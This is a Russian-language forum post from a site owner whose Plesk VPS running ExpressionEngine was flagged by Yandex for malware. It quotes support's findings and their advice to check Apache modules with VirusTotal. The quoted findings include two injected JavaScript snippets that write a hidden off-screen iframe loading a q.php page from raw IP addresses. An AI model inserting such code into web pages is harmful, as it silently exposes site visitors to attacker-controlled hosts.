Kromwel

k.d.r:
Кто-то сталкивался с таким: впс плеск, арендован у рбк, на сайте есть фрейворк expression engine.

Сколько времени на сайте провожу ни разу не заметил никакого вируса. Захожу и получаю предупреждение от яндекса, мол вирус на сайте. Пошел в вебмастер - говорят вирус. Идут смотреть не нашел ничего. Пишу ему, они сказали:

При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил в js скрипте
вредоносный код следующего содержания:

document.write('<style>.x1vvy5fkyw { position:absolute; left:-1828px; top:-1060px} </style> <div class="x1vvy5fkyw"><iframe src="http://69.89.4.78/909a4fce9e610c7ad320e6942b37edf4/q.php" width="418" height="110"></iframe></div>')

посмотрел все файлы, не нашел ничего.

После переписки, сказали что возможно проблема в модулях веб-сервера, которые могут быть заражены либо иметь дырки, которые собственно и делают такие манипуляции с файлами. Что характерно, файлы изменяются, но дата изменения файла не меняется... Парадокс.

Сталкивался ли кто-то?

При проверке Вашего сайта антивирусный комплекс Яндекса обнаружил вредоносный код следующего содержания:

document.write('<style>.idr3nt30ft { position:absolute; left:-1552px; top:-1565px} </style> <div class="idr3nt30ft"><iframe src=" http://65.75.171.190/8e75cb5ad37169f76282d79c2cfd0f29/q.php " width="214" height="214"></iframe></div>');

Мы подозреваем, что источник заражения может находится в модуле веб-сервера. Просмотреть список все модулей Вы можете в файле httpd.conf . Проверьте каждый файл модуля через сервис https://www.virustotal.com . Если какой-то из файлов данный сервис признает инфицированным - пришлите его нам в заархивированном виде с паролем, а пароль укажите в письме. Заранее спасибо за Вашу помощь.